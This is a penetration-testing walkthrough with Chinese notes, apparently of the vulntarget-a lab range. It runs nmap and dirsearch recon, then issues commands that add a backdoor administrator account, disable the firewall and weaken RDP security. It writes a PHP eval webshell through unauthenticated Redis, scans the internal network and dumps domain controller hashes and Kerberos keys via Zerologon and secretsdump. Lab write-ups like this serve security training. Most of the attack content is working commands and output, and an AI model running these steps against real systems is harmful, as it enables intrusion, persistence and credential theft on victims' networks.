Nmap #
[root@Hacking] /home/kali/vulntarget-a
❯ nmap 192.168.237.132 -A
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:99:58:97 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-04T10:23:53+08:00
| smb2-time:
| date: 2025-09-04T02:23:53
|_ start_date: 2025-09-04T02:22:36
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.237.132
Dirsearch #
[root@Hacking] /home/kali/vulntarget-a
❯ dirsearch -u 'http://192.168.237.132/'
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.237.132/
[10:37:07] Scanning:
[10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/
[10:37:11] 403 - 564B - /api/
[10:37:11] 403 - 564B - /attachment.asp
[10:37:11] 403 - 564B - /attachment.aspx
[10:37:11] 403 - 564B - /attachment.jsp
[10:37:11] 403 - 564B - /attachment.html
[10:37:11] 403 - 564B - /attachment.htm
[10:37:11] 403 - 564B - /attachmentedit.asp
[10:37:11] 403 - 564B - /attachmentedit.aspx
[10:37:11] 403 - 564B - /attachmentedit.html
[10:37:11] 403 - 564B - /attachmentedit.jsp
[10:37:11] 403 - 564B - /attachmentedit.htm
[10:37:11] 403 - 564B - /attachments
[10:37:11] 403 - 564B - /attachments.aspx
[10:37:11] 403 - 564B - /attachments.jsp
[10:37:11] 403 - 564B - /attachments.html
[10:37:11] 403 - 564B - /attachments.htm
[10:37:11] 403 - 564B - /attachments.asp
[10:37:13] 200 - 894B - /favicon.ico
[10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/
[10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/
[10:37:14] 403 - 564B - /./images/
[10:37:14] 403 - 564B - /./images/Sym.php
[10:37:14] 403 - 564B - /./images/c99.php
[10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/
[10:37:14] 403 - 564B - /inc/
[10:37:14] 200 - 10KB - /index.php
[10:37:14] 400 - 166B - /index.php::$DATA
[10:37:14] 200 - 10KB - /index.php.
[10:37:14] 200 - 10KB - /index.pHp
[10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/
[10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/
[10:37:17] 200 - 26B - /robots.txt
[10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/
[10:37:17] 200 - 0B - /share/
[10:37:17] 200 - 2KB - /portal/
[10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/
[10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/
[10:37:18] 403 - 564B - /templates/beez/index.php
[10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php
[10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php
[10:37:18] 400 - 166B - /Trace.axd::$DATA
[10:37:19] 400 - 166B - /web.config::$DATA
[10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/
Task Completed
下文中IP我改动了一下,因为有些工具在kali不好用
通达OA #
进入80端口发现是通达OA
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
允许非 TLS、非 NLA 连接远程桌面
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"
Redis #
远程连接后查看网段
[root@Hacking] /home/kali/vulntarget-a
❯ pc -q dirsearch -u 'http://10.0.20.99/'
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://10.0.20.99/
[11:10:04] Scanning:
[11:10:14] 200 - 11B - /index.php
[11:10:14] 200 - 11B - /index.pHp
[11:10:14] 200 - 11B - /index.php.
[11:10:14] 200 - 11B - /index.php/login/
[11:10:14] 403 - 225B - /index.php::$DATA
[11:10:16] 200 - 71KB - /phpinfo.php
[11:10:17] 200 - 14KB - /l.php
[11:10:19] 403 - 225B - /Trace.axd::$DATA
[11:10:20] 403 - 226B - /web.config::$DATA
Task Completed
[root@Hacking] /home/kali/vulntarget-a
❯ pc -q redis-cli -h 10.0.20.99 -p 6379 ⏎
10.0.20.99:6379> set payload "\n<?php eval(\$_POST['cmd']);?>\n"
OK
10.0.20.99:6379> config set dir C:\phpstudy\phptutorial\www
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
C:\> .\fscan.exe -h 10.0.10.111/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 10.0.10.111 is alive
(icmp) Target 10.0.10.110 is alive
[*] Icmp alive hosts len is: 2
10.0.10.110:88 open
10.0.10.111:139 open
10.0.10.111:6379 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.111:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]10.0.10.111
[->]win2016
[->]10.0.20.99
[->]10.0.10.111
[*] WebTitle [http://10.0.10.111](http://10.0.10.111/) code:200 len:11 title:None
[*] NetBios 10.0.10.110 [+] DC:VULNTARGET\WIN2019
[*] NetInfo
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[+] Redis 10.0.10.111:6379 unauthorized file:C:\phpstudy\phptutorial\www/shell.php
已完成 9/9
[*] 扫描结束,耗时: 13.054138s
依旧添加后门以及开启RDP,上去后关掉windows defender
Zerologon #
由于是win2019,可以尝试zerologon(这里挂二层代理)
[root@Hacking] /home/kali/vulntarget-a/CVE-2020-1472 (master)
❯ pc -q impacket-secretsdump vulntarget/'WIN2019$'@10.0.10.110 -no-pass -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:5d1755dbfbefbca94500a6614cecf3e3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:2c70f1e0697700c26486ccab3a4f99ab2a79b46cd49b5a280bbbeb2128578e10
WIN2016$:aes128-cts-hmac-sha1-96:7d23c054ce0fb62fb94b11acab447292
WIN2016$:des-cbc-md5:794fe6aef4dc6d97
[*] Cleaning up...
PTH #
